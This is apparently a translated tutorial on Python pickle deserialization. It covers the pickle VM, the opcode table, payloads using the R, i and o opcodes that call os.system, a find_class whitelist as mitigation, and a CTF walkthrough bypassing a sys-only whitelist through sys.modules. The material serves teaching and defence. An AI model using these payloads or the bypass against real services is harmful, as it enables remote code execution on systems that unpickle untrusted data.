Pickle Deserialization Vulnerabilities

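The pickle module implements binary serialization and deserialization of a Python object structure. "Pickling" is the process of converting a Python object and the hierarchy it owns into a byte stream, and "unpickling" is the inverse operation, converting a byte stream (from a binary file or a bytes-like object) back into an object hierarchy. Pickling (and unpickling) is also known as "serialization", "marshalling", or "flattening". To avoid confusion, the terms "pickling" and "unpickling" are used here.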

Introduction

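pickle is a Python module, and the byte stream it produces is effectively a program in a small stack-based language. Before looking at pickle itself, it helps to understand the PVM (Pickle Virtual Machine). The PVM is an interpreter, similar in spirit to the Python interpreter, but dedicated to processing pickle opcodes and data. It reads the pickle byte stream and uses the opcodes and data in it to rebuild the original Python objects.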

The PVM has three main parts: the stack, the instruction parser, and the memo.

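1. The instruction parser

It reads opcodes and their arguments from the start of the stream and processes them one at a time, modifying the stack and the memo along the way. When processing ends, the object on top of the stack is returned as the deserialized result.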
 
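2. The stack

It is the scratch area used while the stream is processed. Data is pushed and popped as the stream is consumed, and the deserialized result is finally built on the stack.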
 
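3. The memo

The memo is a dictionary (hash table) of objects that have already been processed. It exists so that the same object is not serialized more than once.

When pickling, the pickler checks the memo before writing an object. If the object is already there, it emits a reference to the memo entry instead of serializing the object again, which saves time and space. When unpickling, the PVM stores objects in the memo by index (PUT, BINPUT, MEMOIZE) and pushes them back onto the stack when a later opcode refers to them (GET, BINGET).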
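The effect of the memo can be observed from ordinary Python. The following is a minimal sketch (the variable names are made up for illustration): the same list is placed twice in a container, and after a round trip both slots still point to one object, because the second occurrence was written as a memo reference rather than as a second copy.

```python
import pickle
import pickletools

shared = ["x"]
data = pickle.dumps([shared, shared])

# Collect the opcode names in the stream without executing it.
op_names = [op.name for op, arg, pos in pickletools.genops(data)]
uses_memo_get = any(n in ("GET", "BINGET", "LONG_BINGET") for n in op_names)

restored = pickle.loads(data)
same_object = restored[0] is restored[1]

print(uses_memo_get, same_object)
```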

Pickle (de)serialization

Interface

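pickle.dump(obj, file)
# Pickle obj and write the result to the open binary file
pickle.dumps(obj)
# Pickle obj and return the result directly as bytes
pickle.load(file)
# Read a byte stream from the open binary file, unpickle it, and return the object
pickle.loads(data)
# Read the byte stream from data, unpickle it, and return the object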
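A quick round trip through all four functions, as a minimal sketch. The in-memory io.BytesIO buffer is an assumption made to keep the example self-contained; it stands in for a file opened in binary mode.

```python
import io
import pickle

record = {"name": "Pickle", "age": 18}

# bytes-based API
blob = pickle.dumps(record)
from_bytes = pickle.loads(blob)

# file-based API (BytesIO stands in for a real binary file)
buffer = io.BytesIO()
pickle.dump(record, buffer)
buffer.seek(0)
from_file = pickle.load(buffer)

print(type(blob).__name__, from_bytes == record, from_file == record)
```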

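object.__reduce__()
__reduce__() is called when an object is pickled. The callable it returns is what runs when the byte stream is unpickled, which is why it is often compared to PHP's __wakeup magic method.
__reduce__() is a magic method defined on object, and a class can override it.
Python requires the method to return either a string or a tuple. If it returns a tuple (callable, (para1, para2, ...)[, ...]), then whenever an object of that class is unpickled, callable is called with para1, para2, ... as arguments. This is explained in more detail later.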
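A harmless sketch of this mechanism: the hypothetical class Demo returns the builtin int as its callable, so unpickling yields the result of int("42") rather than a Demo instance. An attacker would return something like os.system in the same position.

```python
import pickle

class Demo:
    # Called at pickling time; the returned callable runs at unpickling time.
    def __reduce__(self):
        return (int, ("42",))

payload = pickle.dumps(Demo())
result = pickle.loads(payload)

print(type(result).__name__, result)
```

Note that the unpickled value is whatever the callable returns, so the receiving side never needs the Demo class to exist.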

demo

import pickle
import pickletools
class Person():  # class name
    def __init__(self):
        self.age=18  # attribute
        self.name="Pickle"

p=Person()
opcode=pickle.dumps(p)
print(opcode)

pickletools.dis(opcode)

# b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x06Person\x94\x93\x94)\x81\x94}\x94(\x8c\x03age\x94K\x12\x8c\x04name\x94\x8c\x06Pickle\x94ub.'

pickletools can turn the binary stream into readable opcodes. The output is interpreted as follows:

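0: \x80 PROTO 4: use pickle protocol version 4.
2: \x95 FRAME 55: the frame that follows is 55 bytes long.
11: \x8c SHORT_BINUNICODE '__main__': push the string '__main__' (short UTF-8 string, under 256 bytes).
21: \x94 MEMOIZE (as 0): store the top of the stack (the string '__main__') in the memo at index 0 for later reference.
22: \x8c SHORT_BINUNICODE 'Person': push the string 'Person'.
30: \x94 MEMOIZE (as 1): store the string 'Person' in the memo at index 1.
31: \x93 STACK_GLOBAL: pop the module name and the attribute name, look up __main__.Person, and push that class.
32: \x94 MEMOIZE (as 2): store the Person class in the memo at index 2.
33: ) EMPTY_TUPLE: push an empty tuple (the arguments for __new__).
34: \x81 NEWOBJ: pop the argument tuple and the class, call Person.__new__(Person), and push the new object.
35: \x94 MEMOIZE (as 3): store the new Person object in the memo at index 3.
36: } EMPTY_DICT: push an empty dict.
37: \x94 MEMOIZE (as 4): store the empty dict in the memo at index 4.
38: ( MARK: push a mark object; it delimits the key/value pairs that follow.
39: \x8c SHORT_BINUNICODE 'age': push the string 'age'.
44: \x94 MEMOIZE (as 5): store the string 'age' in the memo at index 5.
45: K BININT1 18: push the integer 18 (1-byte unsigned int).
47: \x8c SHORT_BINUNICODE 'name': push the string 'name'.
53: \x94 MEMOIZE (as 6): store the string 'name' in the memo at index 6.
54: \x8c SHORT_BINUNICODE 'Pickle': push the string 'Pickle'.
62: \x94 MEMOIZE (as 7): store the string 'Pickle' in the memo at index 7.
63: u SETITEMS (MARK at 38): add the key/value pairs above the MARK to the empty dict created at offset 36.
64: b BUILD: pop the dict and use it to update the Person object's __dict__ (or pass it to __setstate__ if the class defines one).
65: . STOP: end of the pickle; the object on top of the stack is returned.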

Opcode set

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4

SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame

# Protocol 5

BYTEARRAY8       = b'\x96'  # push bytearray
NEXT_BUFFER      = b'\x97'  # push next out-of-band buffer
READONLY_BUFFER  = b'\x98'  # make top of stack readonly
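The table does not have to be memorized. As a small sketch, pickletools exposes the same opcode definitions, so a byte can be mapped to its name, and a hand-written stream can be split into opcodes without executing it. The stream used here is the classic protocol 0 payload shape discussed in the exploitation part; genops only parses it.

```python
import pickletools

# Map each one-character opcode to its symbolic name.
names_by_code = {op.code: op.name for op in pickletools.opcodes}
print(names_by_code["R"], names_by_code["c"], names_by_code["\x93"])

# Parse (do not run) a hand-written protocol 0 stream.
stream = b"cos\nsystem\n(S'whoami'\ntR."
parsed = [op.name for op, arg, pos in pickletools.genops(stream)]
print(parsed)
```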

Root cause

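As with almost every deserialization vulnerability, the cause is that user input is not restricted: unpickling attacker-controlled data leads to execution of malicious code.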

Exploitation

The R opcode

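cos         =>  GLOBAL: read the module name os.
system      =>  read the name system, then push os.system onto the stack.
(S'whoami'  =>  MARK: save the current stack to the metastack and clear the stack, then push 'whoami'.
t           =>  pop the stack values into a tuple, restore the stack from the metastack, then push the tuple.
R           =>  system(*('whoami',)).
.           =>  stop and return the top of the stack.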
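The same opcode sequence can be tried safely by swapping the callable. In this sketch builtins.len replaces os.system (an assumption made only to keep the demo harmless), so R ends up computing len('whoami') instead of running a shell command.

```python
import pickle

# c: push builtins.len; ( S t: build the tuple ('whoami',); R: call it; .: stop
payload = b"cbuiltins\nlen\n(S'whoami'\ntR."
result = pickle.loads(payload)

print(result)  # 6
```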

The i opcode

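INST reads a module name and an attribute name from the stream and looks up that global. It then finds the most recent MARK on the stack, collects the items above it into a tuple, and calls the global with that tuple as its arguments.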

(S'calc'
ios
system
.
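A harmless variant of this payload, as a sketch: builtins.len is substituted for os.system (an assumption for safety), so the i opcode calls len('whoami').

```python
import pickle

# (: MARK; S'whoami': push the argument; i: read "builtins" / "len" and call it
payload = b"(S'whoami'\nibuiltins\nlen\n."
result = pickle.loads(payload)

print(result)  # 6
```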

The o opcode

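OBJ finds the most recent MARK, takes the first item above it as the callable and the second through n-th items as its arguments, and calls it (or instantiates an object).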

(cos
system
S'calc'
o.
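To show the "first item is the callable, the rest are arguments" layout without side effects, this sketch uses builtins.divmod with two integer arguments (a substitution chosen for illustration, not part of the original payload).

```python
import pickle

# (: MARK; c: push builtins.divmod; I7, I2: push two ints; o: call divmod(7, 2)
payload = b"(cbuiltins\ndivmod\nI7\nI2\no."
result = pickle.loads(payload)

print(result)  # (3, 1)
```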

Mitigation

Quoted from an article on Xianzhi (先知):

As with other deserialization vulnerabilities, never trust user input: make sure the data you unpickle never comes from an untrusted or unauthenticated source.

Beyond that, globals can be restricted by overriding Unpickler.find_class():

import builtins
import io
import pickle

safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

    # Override find_class
    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

opcode=b"cos\nsystem\n(S'echo hello world'\ntR."
restricted_loads(opcode)


### Output
Traceback (most recent call last):
...
_pickle.UnpicklingError: global 'os.system' is forbidden

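The example above overrides Unpickler.find_class() so that the only module allowed is builtins and the name must be in the whitelist; anything else raises an exception. Because every global the pickle can reference is confined to the whitelist, the stream cannot reach dangerous callables such as os.system during unpickling.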
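It is worth checking both sides of such a filter. The sketch below repeats the whitelist idea in compact form (the name ALLOWED is chosen here for illustration) and confirms that a whitelisted object still loads while the os.system payload is rejected before anything runs.

```python
import builtins
import io
import pickle

ALLOWED = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only whitelisted builtins; refuse every other global.
        if module == "builtins" and name in ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# A whitelisted global (builtins.range) still round-trips.
allowed = restricted_loads(pickle.dumps(range(3)))

# The R-opcode payload fails in find_class, before os.system is ever resolved.
try:
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(allowed, blocked)
```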

CTF example

BalsnCTF:pyshv1

# File: securePickle.py
import pickle, io

whitelist = []

# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        return pickle.Unpickler.find_class(self, module, name)

def loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

dumps = pickle.dumps


# File: server.py
import securePickle as pickle
import codecs

pickle.whitelist.append('sys')

class Pysh(object):
    def __init__(self):
        self.login()
        self.cmds = {}

    def login(self):
        user = input().encode('ascii')
        user = codecs.decode(user, 'base64')
        user = pickle.loads(user)
        raise NotImplementedError("Not Implemented QAQ")

    def run(self):
        while True:
            req = input('$ ')
            func = self.cmds.get(req, None)
            if func is None:
                print('pysh: ' + req + ': command not found')
            else:
                func()

if __name__ == '__main__':
    pysh = Pysh()
    pysh.run()

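find_class() is overridden with a module whitelist: only the sys module can be referenced, and "." is banned in names, so submodules and nested attributes cannot be used.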

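The bypass is to overwrite sys.modules['sys'] with a different module object. After that, a lookup in 'sys' resolves against the substituted object, so other modules become reachable.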

pker code

modules = GLOBAL('sys', 'modules')
modules['sys'] = modules
module_get = GLOBAL('sys', 'get')
os = module_get('os')
modules['sys'] = os
system = GLOBAL('sys', 'system')
system('whoami')
return
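The lookup chain in the pker script can be traced in plain Python. The sketch below is a simulation under stated assumptions: fake_modules stands in for sys.modules, fake_os stands in for the os module, and find_class only mimics the challenge's check. Nothing here touches the real sys.modules or runs a command.

```python
import types

# Hypothetical stand-ins for the os module and for sys.modules.
fake_os = types.SimpleNamespace(system=lambda cmd: f"ran: {cmd}")
fake_modules = {"os": fake_os}
fake_modules["sys"] = types.SimpleNamespace(modules=fake_modules)

def find_class(module, name):
    """Mimic the challenge filter, resolving names against fake_modules."""
    if module != "sys" or "." in name:
        raise KeyError("The pickle is spoilt :(")
    return getattr(fake_modules[module], name)

modules = find_class("sys", "modules")   # the module table itself
modules["sys"] = modules                 # "sys" now resolves to the dict
module_get = find_class("sys", "get")    # dict.get, bound to the table
os_module = module_get("os")             # fetch the (fake) os module
modules["sys"] = os_module               # "sys" now resolves to os
system = find_class("sys", "system")     # passes the filter, returns os.system
result = system("whoami")

print(result)
```

Every call to find_class uses the module name "sys" and a name without a dot, so the whitelist check passes each time even though the object being searched changes.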
